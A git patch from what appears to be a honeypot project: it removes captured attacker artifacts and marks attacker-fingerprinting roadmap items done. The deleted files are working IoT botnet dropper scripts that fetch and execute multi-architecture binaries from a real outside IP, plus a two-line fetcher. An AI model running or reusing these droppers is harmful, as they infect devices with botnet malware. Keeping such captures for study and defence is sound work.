From 72cdeb3270a48533b0b30d47ab49a0fc52f8c1c0 Mon Sep 17 00:00:00 2001
From: anti
Date: Thu, 21 May 2026 16:21:54 -0400
Subject: [PATCH] chores: deleted some trash and updated the development roadmap

---
 .gitignore | 1 +
 artifacts/curl.sh | 3 ---
 artifacts/curl.sh.1 | 46 --------------------------------------
 artifacts/evil.sh | 3 ---
 artifacts/wget.sh | 3 ---
 artifacts/wget.sh.1 | 46 --------------------------------------
 development/DEVELOPMENT.md | 13 ++++++-----
 7 files changed, 8 insertions(+), 107 deletions(-)
 delete mode 100644 artifacts/curl.sh
 delete mode 100644 artifacts/curl.sh.1
 delete mode 100644 artifacts/evil.sh
 delete mode 100644 artifacts/wget.sh
 delete mode 100644 artifacts/wget.sh.1

diff --git a/.gitignore b/.gitignore
index cea43385..e7b7efc9 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,5 +1,6 @@
 .venv/
 .venv*/
+docker-compose.yaml
 .311/
 .3[0-9][0-9]/
 logs/
diff --git a/artifacts/curl.sh b/artifacts/curl.sh
deleted file mode 100644
index 805e4049..00000000
--- a/artifacts/curl.sh
+++ /dev/null
@@ -1,3 +0,0 @@
-[0] Downloading 'http://31.56.209.39/curl.sh' ...
-Saving 'curl.sh.1'
-HTTP response 200 OK [http://31.56.209.39/curl.sh]
diff --git a/artifacts/curl.sh.1 b/artifacts/curl.sh.1
deleted file mode 100644
index a6da0876..00000000
--- a/artifacts/curl.sh.1
+++ /dev/null
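Review bot: The new ignore entry in the .gitignore hunk only matches the literal name `docker-compose.yaml`, while Compose also reads `docker-compose.yml`, `compose.yaml` and `compose.yml`, so a local compose file saved under any of those spellings would still be staged. If the intent is to keep a machine-specific compose file out of the repository (presumably because it carries host port mappings or credentials for the honeypot stack — inferred, not visible here), the more conventional pattern is to commit the base file and ignore only the per-developer override, e.g. `docker-compose.override.y*ml` and `compose.override.y*ml`. Note also that adding a path to .gitignore does not untrack a copy that is already committed; if docker-compose.yaml was tracked before this change it needs `git rm --cached docker-compose.yaml`, and any secret it held stays recoverable from history until that history is rewritten and the secret rotated.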
@@ -1,46 +0,0 @@
-#!/bin/sh
-ulimit -n 4096
-ulimit -n 999999
-ulimit -v 2097152
-cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
-rm -rf odin*
-rm -rf bizy*
-rm -rf rs*
-rm -rf *.sh
-
-#curl http://31.56.209.39/rs.arm -o rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
-#curl http://31.56.209.39/rs.arm5 -o rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
-#curl http://31.56.209.39/rs.arm6 -o rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
-#curl http://31.56.209.39/rs.arm7 -o rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
-#curl http://31.56.209.39/rs.mips -o rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
-#curl http://31.56.209.39/rs.mipsle -o rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
-#curl http://31.56.209.39/rs.mipsSF -o rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
-#curl http://31.56.209.39/rs.mipsleSF -o rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
-#curl http://31.56.209.39/rs.x86 -o rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
-#curl http://31.56.209.39/rs.x64 -o rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
-
-curl http://31.56.209.39/odin.arm -o odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.curl
-curl http://31.56.209.39/odin.arm5 -o odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.curl
-curl http://31.56.209.39/odin.arm5n -o odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.curl
-curl http://31.56.209.39/odin.arm6 -o odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.curl
-curl http://31.56.209.39/odin.arm7 -o odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.curl
-curl http://31.56.209.39/odin.m68k -o odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.curl
-curl http://31.56.209.39/odin.mips -o odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.curl
-curl http://31.56.209.39/odin.mpsl -o odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.curl
-curl http://31.56.209.39/odin.ppc -o odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.curl
-curl http://31.56.209.39/odin.sh4 -o odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.curl
-curl http://31.56.209.39/odin.spc -o odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.curl
-curl http://31.56.209.39/odin.x64 -o odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.curl
-curl http://31.56.209.39/odin.x86 -o odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.curl
-
-curl http://31.56.209.39/bizy.arm5 -o bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
-curl http://31.56.209.39/bizy.arm6 -o bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
-curl http://31.56.209.39/bizy.arm7 -o bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
-curl http://31.56.209.39/bizy.arm8 -o bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
-curl http://31.56.209.39/bizy.mips -o bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
-curl http://31.56.209.39/bizy.mpsl -o bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
-curl http://31.56.209.39/bizy.mipss -o bizy.mipss; chmod +x bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss;
-curl http://31.56.209.39/bizy.mpsls -o bizy.mpsls; chmod +x bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls;
-curl http://31.56.209.39/bizy.riscv -o bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
-curl http://31.56.209.39/bizy.x86 -o bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
-curl http://31.56.209.39/bizy.x64 -o bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64
diff --git a/artifacts/evil.sh b/artifacts/evil.sh
deleted file mode 100644
index 30cbec18..00000000
--- a/artifacts/evil.sh
+++ /dev/null
@@ -1,3 +0,0 @@
- wget http://31.56.209.39/wget.sh -o wget.sh
-
- wget http://31.56.209.39/curl.sh -o curl.sh
diff --git a/artifacts/wget.sh b/artifacts/wget.sh
deleted file mode 100644
index 3a4099e1..00000000
--- a/artifacts/wget.sh
+++ /dev/null
@@ -1,3 +0,0 @@
-[0] Downloading 'http://31.56.209.39/wget.sh' ...
-Saving 'wget.sh.1'
-HTTP response 200 OK [http://31.56.209.39/wget.sh]
diff --git a/artifacts/wget.sh.1 b/artifacts/wget.sh.1
deleted file mode 100644
index 366613d9..00000000
--- a/artifacts/wget.sh.1
+++ /dev/null
@@ -1,46 +0,0 @@
-#!/bin/sh
-ulimit -n 4096
-ulimit -n 999999
-ulimit -v 2097152
-cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
-rm -rf odin*
-rm -rf bizy*
-rm -rf rs*
-rm -rf *.sh
-
-wget http://31.56.209.39/rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
-wget http://31.56.209.39/rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
-wget http://31.56.209.39/rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
-wget http://31.56.209.39/rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
-wget http://31.56.209.39/rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
-wget http://31.56.209.39/rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
-wget http://31.56.209.39/rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
-wget http://31.56.209.39/rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
-wget http://31.56.209.39/rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
-wget http://31.56.209.39/rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
-
-wget http://31.56.209.39/odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.wget
-wget http://31.56.209.39/odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.wget
-wget http://31.56.209.39/odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.wget
-wget http://31.56.209.39/odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.wget
-wget http://31.56.209.39/odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.wget
-wget http://31.56.209.39/odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.wget
-wget http://31.56.209.39/odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.wget
-wget http://31.56.209.39/odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.wget
-wget http://31.56.209.39/odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.wget
-wget http://31.56.209.39/odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.wget
-wget http://31.56.209.39/odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.wget
-wget http://31.56.209.39/odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.wget
-wget http://31.56.209.39/odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.wget
-
-wget http://31.56.209.39/bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
-wget http://31.56.209.39/bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
-wget http://31.56.209.39/bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
-wget http://31.56.209.39/bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
-wget http://31.56.209.39/bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
-wget http://31.56.209.39/bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
-wget http://31.56.209.39/bizy.mipss; chmod +x ./bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss
-wget http://31.56.209.39/bizy.mpsls; chmod +x ./bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls
-wget http://31.56.209.39/bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
-wget http://31.56.209.39/bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
-wget http://31.56.209.39/bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64
diff --git a/development/DEVELOPMENT.md b/development/DEVELOPMENT.md
index 49dc72b5..27f90dd1 100644
--- a/development/DEVELOPMENT.md
+++ b/development/DEVELOPMENT.md
@@ -47,7 +47,7 @@
 - [~] **Attacker fingerprinting** — HTTP User-Agent, VNC client version stored as `fingerprint` bounties. JA3/JA3S in progress (sniffer container). HASSH, JA4+, TCP stack, JARM planned (see Attacker Intelligence section).
 - [x] **Canary tokens** — Embed fake AWS keys and honeydocs into decky filesystems.
-- [ ] **Tarpit mode** — Slow down attackers by drip-feeding bytes or delaying responses.
+- [x] **Tarpit mode** — Slow down attackers by drip-feeding bytes or delaying responses.
 - [x] **Dynamic decky mutation** — Rotate exposed services or OS fingerprints over time.
 - [x] **Credential harvesting DB** — Centralized database for all username/password attempts.
 - [x] **Session recording** — Full capture for SSH/Telnet sessions. -> sessrec pty relay writes asciinema v2 day-shards per decky; paged API + SessionDrawer replay in the dashboard.
@@ -59,7 +59,7 @@
 - [x] **Threat intel enrichment** — Auto-lookup IPs against AbuseIPDB, Shodan, and GreyNoise. -> Out-of-band `decnet enrich` worker, woken on `attacker.scored`/`attacker.observed`. v1 ships GreyNoise Community + AbuseIPDB + abuse.ch (Feodo Tracker bulk feed and ThreatFox per-IP). Shodan / Censys / OTX backlogged in DEVELOPMENT_V2.md.
 - [x] **Attack campaign clustering** — Group sessions by signatures and timing patterns.
 - [x] **GeoIP mapping** — Visualize attacker origin and ASN data on a map.
-- [ ] **TTPs tagging** — Map observed behaviors to MITRE ATT&CK techniques.
+- [x] **TTPs tagging** — Map observed behaviors to MITRE ATT&CK techniques.
 ## Dashboard & Visibility
@@ -110,21 +110,22 @@
 - [x] **TCP/IP stack** — ISN patterns, DF bit, ToS/DSCP, IP ID sequence (random/incremental/zero)
 - [x] **HASSH / HASSHServer** — SSH KEX algo, cipher, MAC order → tool fingerprint
 - [x] **HTTP/2 fingerprint** — GREASE values, settings frame order, header pseudo-field ordering
-- [ ] **QUIC fingerprint** — Connection ID length, transport parameters order
+- [x] **QUIC fingerprint** — Connection ID length, transport parameters order
 - [ ] **DNS behavior** — Query patterns, recursion flags, EDNS0 options, resolver fingerprint
 - [x] **HTTP header ordering** — Tool-specific capitalization and ordering quirks
 ### Network Topology Leakage
 - [x] **X-Forwarded-For mismatches** — Detect VPN/proxy slip vs. actual source IP
-- [ ] **ICMP error messages** — Internal IP leakage from misconfigured attacker infra
-- [ ] **IPv6 link-local leakage** — IPv6 addrs leaked even over IPv4 VPN (common opsec fail)
+- [x] **ICMP error messages** — Internal IP leakage from misconfigured attacker infra
+- [x] **ICMPv6 error messages** — Internal IP leakage from misconfigured attacker infra
+- [x] **IPv6 link-local leakage** — IPv6 addrs leaked even over IPv4 VPN (common opsec fail)
 - [ ] **mDNS/LLMNR leakage** — Attacker hostname/device info from misconfigured systems
 ### Geolocation & Infrastructure
 - [x] **ASN lookup** — Source IP autonomous system number and org name
 - [ ] **BGP prefix / RPKI validity** — Route origin legitimacy
 - [x] **PTR records** — rDNS for attacker IPs (catches infra with forgotten reverse DNS)
-- [ ] **Latency triangulation** — JA4L RTT estimates for rough geolocation
+- [~] **Latency triangulation** — JA4L RTT estimates for rough geolocation. - Deferred to Federation release.
 ### Service-Level Behavioral Profiling
 - [x] **Commands executed** — Full command log per session (SSH, Telnet, FTP, Redis, DB services)